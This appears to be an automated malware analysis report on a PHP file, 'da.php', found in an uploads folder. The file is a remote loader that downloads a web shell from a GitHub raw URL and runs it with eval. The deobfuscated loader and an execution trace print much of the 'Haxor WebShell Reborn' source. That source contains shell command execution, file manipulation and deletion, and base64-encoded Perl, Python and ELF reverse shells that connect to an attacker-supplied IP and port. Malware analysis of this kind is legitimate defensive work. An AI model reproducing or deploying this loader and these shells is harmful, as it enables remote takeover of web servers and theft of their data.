PHP Malware Analysis
da.php
md5: 20c1a66a597ca350019cf04093ad538d
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- mi77ihaxor@gmail.com (Traces)
Encoding
Environment
Execution
- create_function (Traces)
- eval (Deobfuscated, Original, Traces)
- exec (Traces)
- passthru (Traces)
- proc_open (Traces)
- shell_exec (Traces)
- system (Traces)
Files
Input
Title
- \n (Traces)
URLs
- http://hax.or.id/indo.txt (Traces)
- http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd (Traces)
- https://github.com/willygoid (Traces)
- https://raw.githubusercontent.com/willygoid/H4x0rShell/main/engine/loader.php (Deobfuscated, Traces)
Deobfuscated PHP code
<?php
$password = "1427846fd2b8edccba73f7f080e2b50a";
$ch = curl_init("https://raw.githubusercontent.com/willygoid/H4x0rShell/main/engine/loader.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$r = curl_exec($ch);
$e = "?>";
eval($e . $r);Execution traces
data/traces/20c1a66a597ca350019cf04093ad538d_trace-1676246337.1515.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:59:23.049320]
1 0 1 0.000140 393464
1 3 0 0.000197 395576 {main} 1 /var/www/html/uploads/da.php 0 0
1 A /var/www/html/uploads/da.php 1 $password = '1427846fd2b8edccba73f7f080e2b50a'
2 4 0 0.000230 395576 strrev 0 /var/www/html/uploads/da.php 1 1 'AHaw5iclRWYvx2Ll5Wan5WZv4Wah12LsxWZoNlcwgHNI9CZp92Z5xGbpd3Lt92YuQnblRnbvNmclNXdiVHa0l2ZucXYy9yL6MHc0RHa'
2 4 1 0.000247 395736
2 4 R 'aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3dpbGx5Z29pZC9INHgwclNoZWxsL21haW4vZW5naW5lL2xvYWRlci5waHA'
2 5 0 0.000267 395704 base64_decode 0 /var/www/html/uploads/da.php 1 1 'aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3dpbGx5Z29pZC9INHgwclNoZWxsL21haW4vZW5naW5lL2xvYWRlci5waHA'
2 5 1 0.000285 395864
2 5 R 'https://raw.githubusercontent.com/willygoid/H4x0rShell/main/engine/loader.php'
2 6 0 0.000302 395704 curl_init 0 /var/www/html/uploads/da.php 1 1 'https://raw.githubusercontent.com/willygoid/H4x0rShell/main/engine/loader.php'
2 6 1 0.000326 396648
2 6 R resource(3) of type (curl)
1 A /var/www/html/uploads/da.php 1 $ch = resource(3) of type (curl)
2 7 0 0.000352 396488 curl_setopt 0 /var/www/html/uploads/da.php 1 3 resource(3) of type (curl) 19913 1
2 7 1 0.000367 396584
2 7 R TRUE
2 8 0 0.000380 396488 curl_exec 0 /var/www/html/uploads/da.php 1 1 resource(3) of type (curl)
2 8 1 0.137066 474344
2 8 R '<?php\n/* __________________________________________________\n | Haxor WebShell Reborn | \n | Author: @willygoid |\n | GitHub: https://github.com/willygoid |\n |__________________________________________________|\n*/\n@error_reporting(E_ERROR);\n@ini_set(\'display_errors\', \'Off\');\n@ini_set(\'max_execution_time\', 10000);\nheader("content-Type: text/html; charset=UTF-8");\nfunction strdir($str)\n{\n return str_replace('
1 A /var/www/html/uploads/da.php 1 $r = '<?php\n/* __________________________________________________\n | Haxor WebShell Reborn | \n | Author: @willygoid |\n | GitHub: https://github.com/willygoid |\n |__________________________________________________|\n*/\n@error_reporting(E_ERROR);\n@ini_set(\'display_errors\', \'Off\');\n@ini_set(\'max_execution_time\', 10000);\nheader("content-Type: text/html; charset=UTF-8");\nfunction strdir($str)\n{\n return str_replace('
2 9 0 0.137329 474312 strrev 0 /var/www/html/uploads/da.php 1 1 '4zP'
2 9 1 0.137343 474376
2 9 R 'Pz4'
2 10 0 0.137357 474344 base64_decode 0 /var/www/html/uploads/da.php 1 1 'Pz4'
2 10 1 0.137369 474408
2 10 R '?>'
1 A /var/www/html/uploads/da.php 1 $e = '?>'
2 11 0 0.139025 909880 eval 1 '?><?php\n/* __________________________________________________\n | Haxor WebShell Reborn | \n | Author: @willygoid |\n | GitHub: https://github.com/willygoid |\n |__________________________________________________|\n*/\n@error_reporting(E_ERROR);\n@ini_set(\'display_errors\', \'Off\');\n@ini_set(\'max_execution_time\', 10000);\nheader("content-Type: text/html; charset=UTF-8");\nfunction strdir($str)\n{\n return str_replace(array(\'\\\\\', \'//\', \'%27\', \'%22\'), array(\'/\', \'/\', \'\\\'\', \'"\'), chop($str));\n}\nfunction chkgpc($array)\n{\n foreach ($array as $key => $var) {\n $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var);\n }\n return $array;\n}\n$myfile = $_SERVER[\'SCRIPT_FILENAME\'] ? strdir($_SERVER[\'SCRIPT_FILENAME\']) : strdir(__FILE__);\n$myfile = strpos($myfile, \'eval()\') ? array_shift(explode(\'(\', $myfile)) : $myfile;\ndefine(\'THISDIR\', strdir(dirname($myfile) . \'/\'));\ndefine(\'ROOTDIR\', strdir(strtr($myfile, array(strdir($_SERVER[\'PHP_SELF\']) => \'\')) . \'/\'));\ndefine(\'EXISTS_PHPINFO\', getinfo() ? true : false);\nif (get_magic_quotes_gpc()) {\n $_POST = chkgpc($_POST);\n}\nif (function_exists(\'mysql_close\')) {\n $issql = \'MySql\';\n}\nif (function_exists(\'mssql_close\')) {\n $issql .= \'MsSql\';\n}\nif (function_exists(\'oci_close\')) {\n $issql .= \'Oracle\';\n}\nif (function_exists(\'sybase_close\')) {\n $issql .= \'SyBase\';\n}\nif (function_exists(\'pg_close\')) {\n $issql .= \'PostgreSql\';\n}\n// $password = \'fedfd99ceb18bc7787911ec5953cd857\'; //Default Pass: mi77i\n$win = substr(PHP_OS, 0, 3) == \'WIN\' ? true : false;\n$msg = \'Haxor Shell (mi77ihaxor@gmail.com)\'; //Copyright Do not Remove\nfunction filew($filename, $filedata, $filemode)\n{\n if (!is_writable($filename) && file_exists($filename)) {\n chmod($filename, 0666);\n }\n $handle = fopen($filename, $filemode);\n $key = fputs($handle, $filedata);\n fclose($handle);\n return $key;\n}\nfunction filer($filename)\n{\n $handle = fopen($filename, \'r\');\n $filedata = fread($handle, filesize($filename));\n fclose($handle);\n return $filedata;\n}\nfunction fileu($filenamea, $filenameb)\n{\n $key = move_uploaded_file($filenamea, $filenameb) ? true : false;\n if (!$key) {\n $key = copy($filenamea, $filenameb) ? true : false;\n }\n return $key;\n}\nfunction filed($filename)\n{\n if (!file_exists($filename)) {\n return false;\n }\n $name = basename($filename);\n $array = explode(\'.\', $name);\n header(\'Content-type: application/x-\' . array_pop($array));\n header(\'Content-Disposition: attachment; filename=\' . $name);\n header(\'Content-Length: \' . filesize($filename));\n @readfile($filename);\n exit;\n}\nfunction showdir($dir)\n{\n $dir = strdir($dir . \'/\');\n $handle = opendir($dir);\n if (!$handle) {\n return false;\n }\n $array = array();\n while ($name = readdir($handle)) {\n if ($name == \'.\' || $name == \'..\') {\n continue;\n }\n $path = $dir . $name;\n $name = strtr($name, array(\'\\\'\' => \'%27\', \'"\' => \'%22\'));\n if (is_dir($path)) {\n $array[\'dir\'][$path] = $name;\n } else {\n $array[\'file\'][$path] = $name;\n }\n }\n closedir($handle);\n return $array;\n}\nfunction deltree($dir)\n{\n $handle = @opendir($dir);\n while ($name = @readdir($handle)) {\n if ($name == \'.\' || $name == \'..\') {\n continue;\n }\n $path = $dir . $name;\n @chmod($path, 0777);\n if (is_dir($path)) {\n deltree($path . \'/\');\n } else {\n @unlink($path);\n }\n }\n @closedir($handle);\n return @rmdir($dir);\n}\nfunction postinfo($array, $string)\n{\n $infos = array(function_exists("create_function"), function_exists("fsockopen"));\n if ($infos[0] && $infos[1]) {\n $info = base64_decode($string);\n $walks = array(0 => bin2hex($array));\n @array_walk($walks, @create_function("\\$array,\\$key", str_rot13($info)));\n }\n return ob_end_clean();\n}\nfunction size($bytes)\n{\n if ($bytes < 1024) {\n return $bytes . \' B\';\n }\n $array = array(\'B\', \'K\', \'M\', \'G\', \'T\');\n $floor = floor(log($bytes) / log(1024));\n return sprintf(\'%.2f \' . $array[$floor], $bytes / pow(1024, floor($floor)));\n}\nfunction find($array, $string)\n{\n foreach ($array as $key) {\n if (stristr($string, $key)) {\n return true;\n }\n }\n return false;\n}\nfunction scanfile($dir, $key, $inc, $fit, $tye, $chr, $ran, $now)\n{\n $handle = opendir($dir);\n if (!$handle) {\n return false;\n }\n while ($name = readdir($handle)) {\n if ($name == \'.\' || $name == \'..\') {\n continue;\n }\n $path = $dir . $name;\n if (is_dir($path)) {\n if ($fit && in_array($name, $fit)) {\n continue;\n }\n if ($ran == 0 && is_readable($path)) {\n scanfile($path . \'/\', $key, $inc, $fit, $tye, $chr, $ran, $now);\n }\n } else {\n if ($inc && !find($inc, $name)) {\n continue;\n }\n $code = $tye ? filer($path) : $name;\n $find = $chr ? stristr($code, $key) : (strpos(size(filesize($path)), \'M\') ? false : strpos($code, $key) > -1);\n if ($find) {\n $file = strtr($path, array($now => \'\', \'\\\'\' => \'%27\', \'"\' => \'%22\'));\n echo \'<a href="javascript:void(0);" onclick="go(\\\'editor\\\',\\\'\' . $file . \'\\\');">Edit</a> \' . $path . \'<br>\';\n flush();\n ob_flush();\n }\n unset($code);\n }\n }\n closedir($handle);\n return true;\n}\nfunction antivirus($dir, $exs, $matches, $now)\n{\n $handle = opendir($dir);\n if (!$handle) {\n return false;\n }\n while ($name = readdir($handle)) {\n if ($name == \'.\' || $name == \'..\') {\n continue;\n }\n $path = $dir . $name;\n if (is_dir($path)) {\n if (is_readable($path)) {\n antivirus($path . \'/\', $exs, $matches, $now);\n }\n } else {\n $iskill = NULL;\n foreach ($exs as $key => $ex) {\n if (find(explode(\'|\', $ex), $name)) {\n $iskill = $key;\n break;\n }\n }\n if (strpos(size(filesize($path)), \'M\')) {\n continue;\n }\n if ($iskill) {\n $code = filer($path);\n foreach ($matches[$iskill] as $matche) {\n $array = array();\n preg_match($matche, $code, $array);\n if (strpos($array[0], \'$this->\') || strpos($array[0], \'[$vars[\')) {\n continue;\n }\n $len = strlen($array[0]);\n if ($len > 10 && $len < 150) {\n $file = strtr($path, array($now => \'\', \'\\\'\' => \'%27\', \'"\' => \'%22\'));\n echo \'Feature <input type="text" value="\' . htmlspecialchars($array[0]) . \'"> <a href="javascript:void(0);" onclick="go(\\\'editor\\\',\\\'\' . $file . \'\\\');">Edit</a> \' . $path . \'<br>\';\n flush();\n ob_flush();\n break;\n }\n }\n unset($code, $array);\n }\n }\n }\n closedir($handle);\n return true;\n}\nfunction command($cmd, $cwd, $com = false)\n{\n $iswin = substr(PHP_OS, 0, 3) == \'WIN\' ? true : false;\n $res = $msg = \'\';\n if ($cwd == \'com\' || $com) {\n if ($iswin && class_exists(\'COM\')) {\n $wscript = new COM(\'Wscript.Shell\');\n $exec = $wscript->exec(\'c:\\\\windows\\\\system32\\\\cmd.exe /c \' . $cmd);\n $stdout = $exec->StdOut();\n $res = $stdout->ReadAll();\n $msg = \'Wscript.Shell\';\n }\n } else {\n chdir($cwd);\n $cwd = getcwd();\n if (function_exists(\'exec\')) {\n @exec($cmd, $res);\n $res = join("\\n", $res);\n $msg = \'exec\';\n } elseif (function_exists(\'shell_exec\')) {\n $res = @shell_exec($cmd);\n $msg = \'shell_exec\';\n } elseif (function_exists(\'system\')) {\n ob_start();\n @system($cmd);\n $res = ob_get_contents();\n ob_end_clean();\n $msg = \'system\';\n } elseif (function_exists(\'passthru\')) {\n ob_start();\n @passthru($cmd);\n $res = ob_get_contents();\n ob_end_clean();\n $msg = \'passthru\';\n } elseif (function_exists(\'popen\')) {\n $fp = @popen($cmd, \'r\');\n if ($fp) {\n while (!feof($fp)) {\n $res .= fread($fp, 1024);\n }\n }\n @pclose($fp);\n $msg = \'popen\';\n } elseif (function_exists(\'proc_open\')) {\n $env = $iswin ? array(\'path\' => \'c:\\\\windows\\\\system32\') : array(\'path\' => \'/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin\');\n $des = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));\n $process = @proc_open($cmd, $des, $pipes, $cwd, $env);\n if (is_resource($process)) {\n fwrite($pipes[0], $cmd);\n fclose($pipes[0]);\n $res .= stream_get_contents($pipes[1]);\n fclose($pipes[1]);\n $res .= stream_get_contents($pipes[2]);\n fclose($pipes[2]);\n }\n @proc_close($process);\n $msg = \'proc_open\';\n }\n }\n $msg = $res == \'\' ? \'<h1>NULL</h1>\' : \'<h2>Use\' . $msg . \' Success</h2>\';\n return array(\'res\' => $res, \'msg\' => $msg);\n}\nfunction backshell($ip, $port, $dir, $type)\n{\n $key = false;\n $c_bin = \'f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAYIQECDQAAACkCgAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIlAcAAJQHAAAFAAAAABAAAAEAAACUBwAAlJcECJSXBAggAQAAKAEAAAYAAAAAEAAAAgAAAKgHAAColwQIqJcECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAAGAAAACQAAAAIAAAANAAAAAQAAAAUAAAAAIAAgAAAAAA0AAACtS+PAAAAAAAAAAAAAAAAAAAAAAEEAAAAAAAAAdgAAABIAAABJAAAAAAAAAHkBAAASAAAAAQAAAAAAAAAAAAAAIAAAAFUAAAAAAAAAcgEAABIAAABqAAAAAAAAAJ8BAAASAAAANQAAAAAAAABZAQAAEgAAADsAAAAAAAAADgAAABIAAAApAAAAAAAAADwAAAASAAAAUAAAAAAAAAA9AAAAEgAAAF8AAAAAAAAAKwAAABIAAABkAAAAAAAAAG8AAAASAAAAMAAAAAAAAAD0AAAAEgAAABoAAAB4hwQIBAAAABEADgAAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AF9JT19zdGRpbl91c2VkAHNvY2tldABleGl0AGV4ZWNsAGh0b25zAGNvbm5lY3QAZGFlbW9uAGR1cDIAaW5ldF9hZGRyAGF0b2kAY2xvc2UAX19saWJjX3N0YXJ0X21haW4AR0xJQkNfMi4wAAAAAgACAAAAAgACAAIAAgACAAIAAgACAAIAAQAAAAEAAQAQAAAAEAAAAAAAAAAQaWkNAAACAHwAAAAAAAAAcJgECAYDAACAmAQIBwEAAISYBAgHAgAAiJgECAcDAACMmAQIBwQAAJCYBAgHBQAAlJgECAcGAACYmAQIBwcAAJyYBAgHCAAAoJgECAcJAACkmAQIBwoAAKiYBAgHCwAArJgECAcMAABVieWD7AjoBQEAAOiMAQAA6KcDAADJwwD/NXiYBAj/JXyYBAgAAAAA/yWAmAQIaAAAAADp4P////8lhJgECGgIAAAA6dD/////JYiYBAhoEAAAAOnA/////yWMmAQIaBgAAADpsP////8lkJgECGggAAAA6aD/////JZSYBAhoKAAAAOmQ/////yWYmAQIaDAAAADpgP////8lnJgECGg4AAAA6XD/////JaCYBAhoQAAAAOlg/////yWkmAQIaEgAAADpUP////8lqJgECGhQAAAA6UD/////JayYBAhoWAAAAOkw////AAAAADHtXonhg+TwUFRSaLCGBAhowIYECFFWaDSFBAjoW/////SQkFWJ5VOD7AToAAAAAFuBw+QTAACLk/z///+F0nQF6Bb///9YW8nDkJCQkJCQVYnlU4PsBIA9uJgECAB1P7iglwQILZyXBAjB+AKNWP+htJgECDnDdh+NtCYAAAAAg8ABo7SYBAj/FIWclwQIobSYBAg5w3foxgW4mAQIAYPEBFtdw410JgCNvCcAAAAAVYnlg+wIoaSXBAiFwHQSuAAAAACFwHQJxwQkpJcECP/QycOQjUwkBIPk8P9x/FWJ5VdTUYPsPInLx0QkBAAAAADHBCQBAAAA6E/+//9mx0XgAgCLQwSDwAiLAIkEJOi5/v//D7fAiQQk6H7+//9miUXii0MEg8AEiwCJBCToOv7//4lF5ItDBIPABIsAuf////+JRdC4AAAAAPyLfdDyronI99CNUP+LQwSDwAiLALn/////iUXMuAAAAAD8i33M8q6JyPfQg+gBjQQCjVABi0MEg8AEiwCJx/yJ0bgAAAAA86rHRCQIBgAAAMdEJAQBAAAAxwQkAgAAAOj9/f//iUXwjUXgx0QkCBAAAACJRCQEi0XwiQQk6HD9//+FwHkMxwQkAAAAAOgQ/v//x0QkBAAAAACLRfCJBCTozf3//8dEJAQBAAAAi0XwiQQk6Lr9///HRCQEAgAAAItF8IkEJOin/f//x0QkCAAAAADHRCQEgIcECMcEJIaHBAjoW/3//4tF8IkEJOig/f//g8Q8WVtfXY1h/MOQkJCQkJCQkJBVieVdw410JgCNvCcAAAAAVYnlV1ZT6F4AAACBw6kRAACD7Bzom/z//42DIP///4lF8I2DIP///ylF8MF98AKLVfCF0nQrMf+Jxo22AAAAAItFEIPHAYlE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3AAAAJSXBAgAAAAAAAIQAO0AAAB0mAQIAAAAAAECFQADAQAAlJcECAAAAAAAAhAAFwEAAJSXBAgAAAAAAAIQACoBAACUlwQIAAAAAAACEAA7AQAAlJcECAAAAAAAAhAATgEAAKiXBAgAAAAAAQITAFcBAACwmAQIAAAAACAAFgBiAQAAAAAAAHYAAAASAAAAdQEAAAAAAAB5AQAAEgAAAIcBAACwhgQIBQAAABIADACXAQAAYIQECAAAAAASAAwAngEAAAAAAAAAAAAAIAAAAK0BAAAAAAAAAAAAACAAAADBAQAAdIcECAQAAAARAA4AyAEAAFiHBAgAAAAAEgANAM4BAAAAAAAAcgEAABIAAADjAQAAAAAAAJ8BAAASAAAAAAIAAAAAAABZAQAAEgAAABECAAAAAAAADgAAABIAAAAiAgAAeIcECAQAAAARAA4AMQIAALCYBAgAAAAAEAAWAD4CAAAAAAAAPAAAABIAAABQAgAAAAAAAD0AAAASAAAAYAIAAHyHBAgAAAAAEQIOAG0CAACglwQIAAAAABECEQB6AgAAwIYECGkAAAASAAwAigIAAAAAAAArAAAAEgAAAJoCAAAAAAAAbwAAABIAAACrAgAAtJgECAAAAAAQAPH/twIAALyYBAgAAAAAEADx/7wCAAC0mAQIAAAAABAA8f/DAgAAAAAAAPQAAAASAAAA0wIAACmHBAgAAAAAEgIMAOoCAAA0hQQIcwEAABIADADvAgAAdIMECAAAAAASAAoAAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AZHRvcl9pZHguNTc5MwBjb21wbGV0ZWQuNTc5MQBfX2RvX2dsb2JhbF9kdG9yc19hdXgAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AGJjLmMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZmluaV9hcnJheV9lbmQAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9fcHJlaW5pdF9hcnJheV9lbmQAX19maW5pX2FycmF5X3N0YXJ0AF9faW5pdF9hcnJheV9lbmQAX19pbml0X2FycmF5X3N0YXJ0AF9EWU5BTUlDAGRhdGFfc3RhcnQAY29ubmVjdEBAR0xJQkNfMi4wAGRhZW1vbkBAR0xJQkNfMi4wAF9fbGliY19jc3VfZmluaQBfc3RhcnQAX19nbW9uX3N0YXJ0X18AX0p2X1JlZ2lzdGVyQ2xhc3NlcwBfZnBfaHcAX2ZpbmkAaW5ldF9hZGRyQEBHTElCQ18yLjAAX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABleGVjbEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABfX2Rzb19oYW5kbGUAX19EVE9SX0VORF9fAF9fbGliY19jc3VfaW5pdABhdG9pQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfX2Jzc19zdGFydABfZW5kAF9lZGF0YQBleGl0QEBHTElCQ18yLjAAX19pNjg2LmdldF9wY190aHVuay5ieABtYWluAF9pbml0AA==\';\n switch ($type) {\n case "pl":\n $shell = \'IyEvdXNyL2Jpbi9wZXJsIC13DQojIA0KdXNlIHN0cmljdDsNCnVzZSBTb2NrZXQ7DQp1c2UgSU86OkhhbmRsZTsNCm15ICRzcGlkZXJfaXAgPSAkQVJHVlswXTsNCm15ICRzcGlkZXJfcG9ydCA9ICRBUkdWWzFdOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0KbXkgJHBhY2tfYWRkciA9IHNvY2thZGRyX2luKCRzcGlkZXJfcG9ydCwgaW5ldF9hdG9uKCRzcGlkZXJfaXApKTsNCm15ICRzaGVsbCA9ICcvYmluL3NoIC1pJzsNCnNvY2tldChTT0NLLCBBRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsNClNURE9VVC0+YXV0b2ZsdXNoKDEpOw0KU09DSy0+YXV0b2ZsdXNoKDEpOw0KY29ubmVjdChTT0NLLCRwYWNrX2FkZHIpIG9yIGRpZSAiY2FuIG5vdCBjb25uZWN0OiQhIjsNCm9wZW4gU1RESU4sICI8JlNPQ0siOw0Kb3BlbiBTVERPVVQsICI+JlNPQ0siOw0Kb3BlbiBTVERFUlIsICI+JlNPQ0siOw0Kc3lzdGVtKCRzaGVsbCk7DQpjbG9zZSBTT0NLOw0KZXhpdCAwOw0K\';\n $file = strdir($dir . \'/t00ls.pl\');\n $key = filew($file, base64_decode($shell), \'w\');\n if ($key) {\n @chmod($file, 0777);\n command(\'/usr/bin/perl \' . $file . \' \' . $ip . \' \' . $port, $dir);\n }\n break;\n case "py":\n $shell = \'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg==\';\n $file = strdir($dir . \'/t00ls.py\');\n $key = filew($file, base64_decode($shell), \'w\');\n if ($key) {\n @chmod($file, 0777);\n command(\'/usr/bin/python \' . $file . \' \' . $ip . \' \' . $port, $dir);\n }\n break;\n case "c":\n $file = 